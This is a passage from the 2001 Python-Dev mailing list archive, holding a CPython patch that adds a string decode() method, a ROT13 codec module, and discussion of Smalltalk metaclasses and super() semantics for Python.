> >
> >       zzz = data.encode('gzip')
> >       ...
> >       data = zzz.decode('gzip')
> >
> >       jpegimage = gifimage.decode('gif').encode('jpeg')
> >
> >       mp3audio = wavaudio.decode('wav').encode('mp3')
> >
> >       etc.
> 
> How would you do this currently?

By looking up the codecs using the codec registry and
then calling them directly.
 
> > Basically all content transfer encodings can take advantage of
> > these two methods.
> >
> > It's not really code bloat, BTW, since the C API is there;
> > the .decode() method would just expose it.
> 
> Show me the patch and I'll decide whether it's code bloat. :-)

I've attached the patch. Due to a small reorganisation the
patch is a little longer -- symmetry has its price at C level
too ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/
--------------891C60CC0A920DAE275D45C5
Content-Type: text/plain; charset=us-ascii;
 name="string.decode.patch"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="string.decode.patch"

--- CVS-Python/Include/stringobject.h	Sat Feb 24 10:30:49 2001
+++ Dev-Python/Include/stringobject.h	Wed May  2 21:05:12 2001
@@ -105,10 +105,19 @@ extern DL_IMPORT(PyObject*) PyString_AsE
     PyObject *str,	 	/* string object */
     const char *encoding,	/* encoding */
     const char *errors		/* error handling */
     );
 
+/* Decodes a string object and returns the result as Python string
+   object. */
+
+extern DL_IMPORT(PyObject*) PyString_AsDecodedString(
+    PyObject *str,	 	/* string object */
+    const char *encoding,	/* encoding */
+    const char *errors		/* error handling */
+    );
+
 /* Provides access to the internal data buffer and size of a string
    object or the default encoded version of an Unicode object. Passing
    NULL as *len parameter will force the string buffer to be
    0-terminated (passing a string with embedded NULL characters will
    cause an exception).  */
--- CVS-Python/Objects/stringobject.c	Wed May  2 16:19:22 2001
+++ Dev-Python/Objects/stringobject.c	Wed May  2 21:04:34 2001
@@ -138,42 +138,56 @@ PyString_FromString(const char *str)
 PyObject *PyString_Decode(const char *s,
 			  int size,
 			  const char *encoding,
 			  const char *errors)
 {
-    PyObject *buffer = NULL, *str;
+    PyObject *v, *str;
+
+    str = PyString_FromStringAndSize(s, size);
+    if (str == NULL)
+	return NULL;
+    v = PyString_AsDecodedString(str, encoding, errors);
+    Py_DECREF(str);
+    return v;
+}
+
+PyObject *PyString_AsDecodedString(PyObject *str,
+				   const char *encoding,
+				   const char *errors)
+{
+    PyObject *v;
+
+    if (!PyString_Check(str)) {
+        PyErr_BadArgument();
+        goto onError;
+    }
 
     if (encoding == NULL)
 	encoding = PyUnicode_GetDefaultEncoding();
 
     /* Decode via the codec registry */
-    buffer = PyBuffer_FromMemory((void *)s, size);
-    if (buffer == NULL)
-        goto onError;
-    str = PyCodec_Decode(buffer, encoding, errors);
-    if (str == NULL)
+    v = PyCodec_Decode(str, encoding, errors);
+    if (v == NULL)
         goto onError;
     /* Convert Unicode to a string using the default encoding */
-    if (PyUnicode_Check(str)) {
-	PyObject *temp = str;
-	str = PyUnicode_AsEncodedString(str, NULL, NULL);
+    if (PyUnicode_Check(v)) {
+	PyObject *temp = v;
+	v = PyUnicode_AsEncodedString(v, NULL, NULL);
 	Py_DECREF(temp);
-	if (str == NULL)
+	if (v == NULL)
 	    goto onError;
     }
-    if (!PyString_Check(str)) {
+    if (!PyString_Check(v)) {
         PyErr_Format(PyExc_TypeError,
                      "decoder did not return a string object (type=%.400s)",
-                     str->ob_type->tp_name);
-        Py_DECREF(str);
+                     v->ob_type->tp_name);
+        Py_DECREF(v);
         goto onError;
     }
-    Py_DECREF(buffer);
-    return str;
+    return v;
 
  onError:
-    Py_XDECREF(buffer);
     return NULL;
 }
 
 PyObject *PyString_Encode(const char *s,
 			  int size,
@@ -1773,10 +1780,29 @@ string_encode(PyStringObject *self, PyOb
         return NULL;
     return PyString_AsEncodedString((PyObject *)self, encoding, errors);
 }
 
 
+static char decode__doc__[] =
+"S.decode([encoding[,errors]]) -> string\n\
+\n\
+Return a decoded string version of S. Default encoding is the current\n\
+default string encoding. errors may be given to set a different error\n\
+handling scheme. Default is 'strict' meaning that encoding errors raise\n\
+a ValueError. Other possible values are 'ignore' and 'replace'.";
+
+static PyObject *
+string_decode(PyStringObject *self, PyObject *args)
+{
+    char *encoding = NULL;
+    char *errors = NULL;
+    if (!PyArg_ParseTuple(args, "|ss:decode", &encoding, &errors))
+        return NULL;
+    return PyString_AsDecodedString((PyObject *)self, encoding, errors);
+}
+
+
 static char expandtabs__doc__[] =
 "S.expandtabs([tabsize]) -> string\n\
 \n\
 Return a copy of S where all tab characters are expanded using spaces.\n\
 If tabsize is not given, a tab size of 8 characters is assumed.";
@@ -2347,10 +2373,11 @@ string_methods[] = {
 	{"title",       (PyCFunction)string_title,       1, title__doc__},
 	{"ljust",       (PyCFunction)string_ljust,       1, ljust__doc__},
 	{"rjust",       (PyCFunction)string_rjust,       1, rjust__doc__},
 	{"center",      (PyCFunction)string_center,      1, center__doc__},
 	{"encode",      (PyCFunction)string_encode,      1, encode__doc__},
+	{"decode",      (PyCFunction)string_decode,      1, decode__doc__},
 	{"expandtabs",  (PyCFunction)string_expandtabs,  1, expandtabs__doc__},
 	{"splitlines",  (PyCFunction)string_splitlines,  1, splitlines__doc__},
 #if 0
 	{"zfill",       (PyCFunction)string_zfill,       1, zfill__doc__},
 #endif

--------------891C60CC0A920DAE275D45C5--


From mal@lemburg.com  Wed May  2 21:36:30 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 22:36:30 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>
 <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com>
Message-ID: <3AF06FCE.854D4DF7@lemburg.com>

This is a multi-part message in MIME format.
--------------5800C85BDAA2AC1AD23ED42E
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Here's a little fun codec to play with. It encodes the input
using the ROT13 encoding (which is 1-1 and idempotent). The
main difference over the existing codecs is that it returns
a string rather than Unicode.

To install it, simply place it in some directory on your Python 
path.

Here's some sample output (Netscape can unscramble this BTW):

"""
Urer'f n yvggyr sha pbqrp gb cynl jvgu. Vg rapbqrf gur vachg
hfvat gur EBG13 rapbqvat (juvpu vf 1-1 naq vqrzcbgrag). Gur
znva qvssrerapr bire gur rkvfgvat pbqrpf vf gung vg ergheaf
n fgevat engure guna Havpbqr.

Gb vafgnyy vg, fvzcyl cynpr vg va fbzr qverpgbel ba lbhe Clguba 
cngu.
"""

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/
--------------5800C85BDAA2AC1AD23ED42E
Content-Type: text/python; charset=us-ascii;
 name="rot_13.py"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="rot_13.py"

#!/usr/local/bin/python2.1
""" 
Python Character Mapping Codec for ROT13.

See http://ucsub.colorado.edu/~kominek/rot13/ for details.

Written by Marc-Andre Lemburg (mal@lemburg.com).

"""#"

import codecs

### Codec APIs

class Codec(codecs.Codec):

    def encode(self,input,errors='strict'):

        return codecs.charmap_encode(input,errors,encoding_map)
        
    def decode(self,input,errors='strict'):

        return codecs.charmap_decode(input,errors,decoding_map)

class StreamWriter(Codec,codecs.StreamWriter):
    pass
        
class StreamReader(Codec,codecs.StreamReader):
    pass

### encodings module API

def getregentry():

    return (Codec().encode,Codec().decode,StreamReader,StreamWriter)

### Decoding Map

decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
   0x0041: 0x004e,
   0x0042: 0x004f,
   0x0043: 0x0050,
   0x0044: 0x0051,
   0x0045: 0x0052,
   0x0046: 0x0053,
   0x0047: 0x0054,
   0x0048: 0x0055,
   0x0049: 0x0056,
   0x004a: 0x0057,
   0x004b: 0x0058,
   0x004c: 0x0059,
   0x004d: 0x005a,
   0x004e: 0x0041,
   0x004f: 0x0042,
   0x0050: 0x0043,
   0x0051: 0x0044,
   0x0052: 0x0045,
   0x0053: 0x0046,
   0x0054: 0x0047,
   0x0055: 0x0048,
   0x0056: 0x0049,
   0x0057: 0x004a,
   0x0058: 0x004b,
   0x0059: 0x004c,
   0x005a: 0x004d,
   0x0061: 0x006e,
   0x0062: 0x006f,
   0x0063: 0x0070,
   0x0064: 0x0071,
   0x0065: 0x0072,
   0x0066: 0x0073,
   0x0067: 0x0074,
   0x0068: 0x0075,
   0x0069: 0x0076,
   0x006a: 0x0077,
   0x006b: 0x0078,
   0x006c: 0x0079,
   0x006d: 0x007a,
   0x006e: 0x0061,
   0x006f: 0x0062,
   0x0070: 0x0063,
   0x0071: 0x0064,
   0x0072: 0x0065,
   0x0073: 0x0066,
   0x0074: 0x0067,
   0x0075: 0x0068,
   0x0076: 0x0069,
   0x0077: 0x006a,
   0x0078: 0x006b,
   0x0079: 0x006c,
   0x007a: 0x006d,
})

### Encoding Map

encoding_map = {}
for k,v in decoding_map.items():
    encoding_map[v] = k

### Filter API

def rot13(infile, outfile):
    outfile.write(infile.read().encode('rot-13'))

if __name__ == '__main__':
    import sys
    rot13(sys.stdin, sys.stdout)

--------------5800C85BDAA2AC1AD23ED42E--


From guido@digicool.com  Wed May  2 23:11:07 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 17:11:07 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 13:12:21 +0200."
 <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook>
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
 <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook>
Message-ID: <200105022211.RAA05242@cj20424-a.reston1.va.home.com>

> [From Jim Althoff]
> > In the list below, indentation indicates class hieararchy (superclass --
> > subclass)
> The indentation, unfortunately, seems to be destroyed.
[...]
> A question for Jim (this is more Smalltalk than Python related):
> How does the Behaviour class fit into this picture?

Jim responded with a much clearer diagram, and as a bonus an answer to
your question about Behaviour!

> Hi Guido,
> 
> Sorry about the mangled diagram.  It's kind of tricky doing this with just
> text.  :-)    Anyway, below is a -- hopefully -- improved diagram and
> description.
> 
> At the very bottom is an answer to the question about "Behavior".
> 
> Jim
> 
> ==========================================
> 
> Smalltalk-80 (simplified) class/metaclass structure:
> 
> Terminology:
> o A "class" is an object that can be instantiated.
> o A "metaclass" is a class and is one such that when _it_ is instantiated
> _that_ instance is _itself_ a class (which can be instantiated).
> (A metaclass is a specialization of class).
> 
> Essentially,  there are two parallel hierarchies: 1) the class hierarchy
> and 2) the metaclass hierarchy.  The class hierarchy starts with class
> Object.  The metaclass hierarchy starts right below Class with the
> metaclass ObjectMetaClass.
> 
> <none>
> o Object
>     o Class
>         o MetaClass
>         o ObjectMetaClass
>             o ClassMetaClass
>                 o MetaClassMetaClass
> 
> Object is the top of the class hierarchy (and total hierarchy).  It has no
> superclass.  It is the only class that has no superclass.
> Class is a subclass of Object.
> MetaClass is a subclass of Class.
> 
> ObjectMetaClass is also a subclass of Class.
> ClassMetaClass is a subclass of ObjectMetaClass.
> MetaClassMetaClass is a subclass of ClassMetaClass.
> 
> Adding in application classes Rectangle and SpamRectangle then might look
> like:
> 
> <none>
> o Object
>     o Class
>         o MetaClass
>         o ObjectMetaClass
>             o ClassMetaClass
>                 o MetaClassMetaClass
>             o RectangleMetaClass
>                 o SpamRectangleMetaClass
>     o Rectangle
>         o SpamRectangle
> 
> Rectangle is a subclass of Object.
> SpamRectangle is a subclass of Rectangle.
> 
> RectangleMetaClass is a subclass of ObjectMetaClass.
> SpamRectangleMetaClass is a subclass of RectangleMetaClass.
> 
> Rectangle is an instance of RectangleMetaClass.
> SpamRectangle is an instance of SpamRectangleMetaClass.
> (SpamRectangleMetaClass is an instance of MetaClass.)
> 
> The next list shows both the subclass- and the instanceOf- relationships
> between classes and metaclasses.
> 
> In this list a class listed below another class is a subclass of it.
> SpamMC is an abbreviation for SpamMetaClass (the metaclass of class Spam --
> the class of which class Spam is an instance).
> 
> <none>                Class
> Object    instanceOf  ObjectMC    instanceOf  MetaClass
> Class     instanceOf  ClassMC     instanceOf  MetaClass
> MetaClass instanceOf  MetaClassMC instanceOf  MetaClass
> 
> ObjectMetaClass, ClassMetaClass, and MetaClassMetaClass are all instances
> of MetaClass.
> 
> MetaClass is an instance of MetaClassMetaClass  But MetaClassMetaClass is
> an instance of MetaClass.  So this particular relationship is circular.
> (In Smalltalk-76, Class was an instance of itself.)
> 
> Application classes would have a similar, parallel hierarchy between
> classes and their associated metaclasses.  For example:
> 
> Object        instanceOf ObjectMC        instanceOf MetaClass
> Rectangle     instanceOf RectangleMC     instanceOf MetaClass
> SpamRectangle instanceOf SpamRectangleMC instanceOf MetaClass
> 
> When you create class SpamRectangle as a subclass of class Rectangle, the
> code in the class-creation method first creates the metaclass
> SpamRectangleMetaClass -- by instantiating MetaClass -- as a subclass of
> RectangleMetaClass.  The code then creates the SpamRectangle class as an
> instance of the SpamRectangleMetaClass metaclass it just created.
> 
> You can then create instances of class SpamRectangle.
> 
> SpamRectangle "instance methods" reside in the method dict of
> SpamRectangle.
> SpamRectangle "class methods" reside in the method dict of
> SpamRectangleMetaClass.
> 
> ============================
> 
> Regarding Thomas' question:
> 
> The Smalltalk-80 class hierarchy actually has a bit more factoring than
> what I show above.  In particular, Class and MetaClass are subclasses of
> the class ClassDescription.  ClassDescription is a subclass of class
> Behavior.  Behavior is a subclass of Object.
> 
> So it looks like:
> 
> <none>
> o Object
>     o Behavior
>         o ClassDescription
>             o MetaClass
>             o Class
>                 o ObjectMetaClass
>                     o BehaviorMetaClass
>                         o ClassDescriptionMetaClass
>                             o MetaClassMetaClass
>                             o ClassMetaClass
> 
> Class Behavior basically abstracts the creation and handling of method
> dict.s.  Class ClassDescription factors out common, reusable code between
> MetaClass and Class.  Clearly there are a number of ways of designing (or
> over-designing <wink> ) this part of the hierarchy.  The key idea, though,
> was to use the subclassing mechanism as a way of supportig specialized
> class methods.
> 
> =============================

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Wed May  2 22:24:28 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 2 May 2001 17:24:28 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/lib libfuncs.tex,1.76,1.77
In-Reply-To: <E14v35l-0007pQ-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOKJPAA.tim.one@home.com>

[Fred L. Drake]
> Update the filter() and list() descriptions to include information
> about the support for containers and iteration.
> ...
>   \begin{funcdesc}{list}{sequence}
> !   Return a list whose items are the same and in the same order as
> !   \var{sequence}'s items.  \var{sequence} may be either a sequence,
> !   a container that supports iteration, or an iterator object.
> ...

[and similarly for filter()]

Before we repeat this last incantation umpteen more times in the docs, is
this how we want it to read in the end?  The truth of the implementation and
of the design is that "sequence" is any object that supports iteration,
period (if PyObject_GetIter(op) succeeds, list(op) etc are happy, else they
raise TypeError).  "A sequence" and "an iterator object" *always* support
iteration, so naming them too appears to draw a distinction that doesn't
exist.

Suggested alternative:

    \var{sequence} must support iteration (see XXX).

where XXX is common boilerplate explaining what "support iteration" means,
and that sequences and iterator objects are just particular cases of that.
Note that this boilerplate may expand to include generators too before 2.2 is
real, and a generator isn't really "a container that supports iteration" (the
word "container" is a strain in the generator context).  That is, a
long-winded incantation is just going to get longer over time, and if it's
repeated umpteen places in the docs I doubt they'll all get updated when
needed.


From michel@digicool.com  Wed May  2 22:43:42 2001
From: michel@digicool.com (Michel Pelletier)
Date: Wed, 2 May 2001 14:43:42 -0700 (PDT)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105022211.RAA05242@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.LNX.4.32.0105021441060.780-100000@localhost.localdomain>


On Wed, 2 May 2001, Guido van Rossum wrote:

> > <none>
> > o Object
> >     o Class
> >         o MetaClass
> >         o ObjectMetaClass
> >             o ClassMetaClass
> >                 o MetaClassMetaClass
> >
> > Object is the top of the class hierarchy (and total hierarchy).  It has no
> > superclass.  It is the only class that has no superclass.
> > Class is a subclass of Object.
> > MetaClass is a subclass of Class.
> >
> > ObjectMetaClass is also a subclass of Class.
> > ClassMetaClass is a subclass of ObjectMetaClass.
> > MetaClassMetaClass is a subclass of ClassMetaClass.

Does this go on ad infinitum?  ie, is there a ClassMetaClassMetaClass
which sublcasses MetaClassMetaClass and so on?  I was under the impression
from talking to JimF that Smalltalk eventually stopped at a class
that is a subclass of itself.

-Michel


From greg@cosc.canterbury.ac.nz  Thu May  3 02:35:29 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 13:35:29 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AEFCEBD.2E5979C9@lemburg.com>
Message-ID: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal@lemburg.com>:

> I'm not sure I can follow you here: DictType.__repr__ is the
> representation method of the dictionary and not inherited
> from TypeType, so there should be no problem.

The problem is that DictType.__repr__ could mean either
the unbound method for finding the repr of a dictionary,
or the bound method for finding the repr of DictType
itself.

This ambiguity is inherent in the Python language as soon
as you try to make classes into instances (which you have
to do as a consequence of making types into classes).

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Thu May  3 04:15:41 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:15:41 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <Pine.LNX.4.32.0105021441060.780-100000@localhost.localdomain>
Message-ID: <200105030315.PAA16465@s454.cosc.canterbury.ac.nz>

Michel Pelletier <michel@digicool.com>:

> I was under the impression
> from talking to JimF that Smalltalk eventually stopped at a class
> that is a subclass of itself.

Some years ago, while playing with Sun's Postscript-based
NeWS window system, I devised an OO language (called P) that 
got translated into PostScript. It had a very Smalltalk-like
class/metaclass system, although rather simpler than what
JimF described. As I remember, the kernel consisted
of a little knot of about 6 classes with some interesting
incestuous relationships between them.

If anyone's interested, I could dig out the code and
provide details of how it all worked. There might be some
ideas that could be used in Python.

(Programming in P felt a lot like programming in Python,
by the way. If my name had been Guido, who knows where it
might have led!)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Thu May  3 04:25:12 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:25:12 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AEFF710.9471.8025D7EA@localhost>
Message-ID: <200105030325.PAA16469@s454.cosc.canterbury.ac.nz>

Gordon McMillan <gmcm@hypernet.com>:

> I would like to see ... some discussion of the expected 
> pragmatic benefits. (That's a different topic from subclassing 
> types.)

Actually, it's not -- the two issues are connected.

Suppose we succeed in unifying types and classes. Then
instead of classes being of type ClassType, they are
now instances of ClassClass. So classes are also
instances, or in other words, we have unified classes
and instances.

So even if we don't go as far as adding Smalltalk-style
class-methods-via-metaclasses, we still have to deal
with the fact that some things will be both classes
and instances.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Thu May  3 04:27:34 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:27:34 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>
Message-ID: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz>

Guido:

> Actually, I think that what's in the __dict__ is just perfect

I was thinking of backwards compatibility for people who
are hacking the __dict__ of a class directly.

If you don't care about that, the problem is simpler.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Thu May  3 04:39:08 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:39:08 +1200 (NZST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <200105021511.KAA32271@cj20424-a.reston1.va.home.com>
Message-ID: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz>

Guido:

> Will we need to add a "::" operator to Python???

If so, I hope we can find a syntax that doesn't remind
one of C++ so much...

I have an idea! 

How about spelling super(self, MyBaseClass) as

   MyBaseClass[self]

This can be thought of as a sort of "cast" which turns self
into an object which behaves like it were an instance of
MyBaseClass. Then we can write

   MyBaseClass[self].foo(args)

Advantages:
* Concise and uncluttered
* No new syntax needed
* Can be implemented using existing mechanisms
* Doesn't even remotely resemble anything in C++ :-)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From tim.one@home.com  Thu May  3 06:49:04 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 3 May 2001 01:49:04 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AF01381.592AE31B@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>

[MAL, on basemethods]
> ...
> In other words: you let Python continue the search for the method
> as if it hadn't found the occurrance calling the bsaemethod()
> API. Hmm, still not clear enough... better let Tim jump in here
> (we've had a discussion about basemethod() some months or years
> ago). Tim ?

Sorry, I'm not sure what either of you is talking about.  In

class A(B, C):
    def foo(self):
        super.foo()

Guido said that super would start searching at B, but I don't know what your
"continue the search for the method as if it hadn't found the occurrance
calling the bsaemethod() API" means:  defining what a thing does in terms of
an unspecified API it doesn't use is a pretty sure recipe for compounded
confusion <wink>.

Given that we're using Python's search rules, the ambiguous point remaining
is whether:

    super.f()

textually contained in a method of class K begins searching with:

    1) K.__bases__

or with:

    2) self.__class__.__bases__

Java uses #1, and Guido's "the search starts with B" implies that he would
too.  But it's unclear whether he meant that.  Given also

class D(A):
    def foo(self):
        super.foo()

D().foo()

both views agree that D.foo() is invoked first, and that D.foo() invokes
A.foo() next.  But under #1 A.foo() invokes C.foo() or D.foo() next, while
under #2 A.foo() invokes A.foo() again.  Multiple inheritance is a red
herring here -- take C out of A's bases, and the same ambiguity needs to be
resolved.


From greg@cosc.canterbury.ac.nz  Thu May  3 06:56:07 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 17:56:07 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>
Message-ID: <200105030556.RAA16509@s454.cosc.canterbury.ac.nz>

Tim:

> Java uses #1, and Guido's "the search starts with B" implies that he would
> too.  But it's unclear whether he meant that.

It's the only sane thing for him to mean, as far as I can see.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From pf@artcom-gmbh.de  Thu May  3 07:29:03 2001
From: pf@artcom-gmbh.de (Peter Funk)
Date: Thu, 3 May 2001 08:29:03 +0200 (MEST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> from Greg Ewing at "May 3, 2001  3:39: 8 pm"
Message-ID: <m14vCbn-000D2zC@artcom0.artcom-gmbh.de>

Hi,

Greg Ewing:
[...]
> How about spelling super(self, MyBaseClass) as
> 
>    MyBaseClass[self]
> 
> This can be thought of as a sort of "cast" which turns self
> into an object which behaves like it were an instance of
> MyBaseClass. Then we can write
> 
>    MyBaseClass[self].foo(args)
> 
> Advantages:
> * Concise and uncluttered
> * No new syntax needed
> * Can be implemented using existing mechanisms
> * Doesn't even remotely resemble anything in C++ :-)

Disadvantages:
* People will confuse this with calling MyBaseClass.__getitem__(....)
* Doesn't even remotely resemble anything in C++

We have to face it:  I myself don't like C++ either, but a *lot*
of people today are already familar with C++ today.  Giving them
something they are already familar with, will make it easier to
convert some of them to Python.

To Greg: This '::' operator is not at all that ugly and AFAI can see
would not introduce any backward incompatible change to the language.
I'm sure C++ has some other real warts to offer that we both don't
want to see in a future version of Python.  Right?

Regards, Peter
-- 
Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260
office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany)


From mal@lemburg.com  Thu May  3 08:49:37 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 09:49:37 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>
Message-ID: <3AF10D91.802C8555@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal@lemburg.com>:
> 
> > I'm not sure I can follow you here: DictType.__repr__ is the
> > representation method of the dictionary and not inherited
> > from TypeType, so there should be no problem.
> 
> The problem is that DictType.__repr__ could mean either
> the unbound method for finding the repr of a dictionary,
> or the bound method for finding the repr of DictType
> itself.
> 
> This ambiguity is inherent in the Python language as soon
> as you try to make classes into instances (which you have
> to do as a consequence of making types into classes).

We are actually trying to turn classes into types here :-)

Really, I think that we could resolve this issue by not inheriting
from meta-classes. DictType is a creation of the meta-class
TypeType. I'm not calling these instances to prevent additional
confusion. The root of the problem is that for some reason there
is belief that DictType should implicitly inherit attributes and 
methods from TypeType. If we simply say that there is no implicit
inheritance (only explicit one), then these problems should go
away.

Some of these ideas are burried in the "super" part of this 
thread. Unfortunately this concept doesn't go very far since
Python has multiple inheritance and thus the term "super"
(referring to the class' single base class) is not well-defined.

As Jim mentioned in his reply to Thomas' question, SmallTalk
has two parallel hierarchies. One for the classes and one for
the meta-classes. If we follow the same path in Python and
keep the two well separated, I think we can resolve many of
the issues which are currently showing up.

To link the two hierarchies together we don't need a "super"
concept, but instead a way to reach the meta-class in charge
of a class, say "klass.__creator__". 

Note that there's another issue hiding in all this and again
this is due to multiple inheritance: which meta-class is in
charge of a class which is derived from two classes having
different meta-classes ?

meta1            -->         o klass1
                               o klass1a
                               o klass1b
meta2            -->         o klass2
                               o klass2a
                               o klass2b

class klass3(klass1a, klass2b):
      ...                  

I think there's no clean way to resolve this, so I'd suggest
to simply rule this out and declare it illegal (class can
only be based on classes having the same meta-class).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From barry@digicool.com  Thu May  3 09:24:16 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Thu, 3 May 2001 04:24:16 -0400
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com>
 <200105021918.OAA03080@cj20424-a.reston1.va.home.com>
 <3AF052CE.E928BDA1@lemburg.com>
 <200105021938.OAA03550@cj20424-a.reston1.va.home.com>
 <3AF0662D.48671B4E@lemburg.com>
 <3AF06FCE.854D4DF7@lemburg.com>
Message-ID: <15089.5552.164307.344721@anthem.wooz.org>

>>>>> "M" == M  <mal@lemburg.com> writes:

    M> Here's a little fun codec to play with. It encodes the input
    M> using the ROT13 encoding (which is 1-1 and idempotent).

LOL!  Guess what `language' I chose to use when testing Mailman's i18n
support?  :)

-Barry


From fredrik@pythonware.com  Thu May  3 09:11:10 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Thu, 3 May 2001 10:11:10 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  	            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com>
Message-ID: <028a01c0d3a8$9e05f190$e46940d5@hagrid>

mal wrote:
 
> Here's some sample output (Netscape can unscramble this BTW):

heh.  just discovered that outlook express can deal with this
too -- but only if the message comes from the usenet.

on ordinary mail, the "unscramble rot13" menu entry is disabled
(too much usability testing?)

maybe you could repost your secret message to comp.lang.python ;-)

Cheers /F


From mal@lemburg.com  Thu May  3 10:05:41 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 11:05:41 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
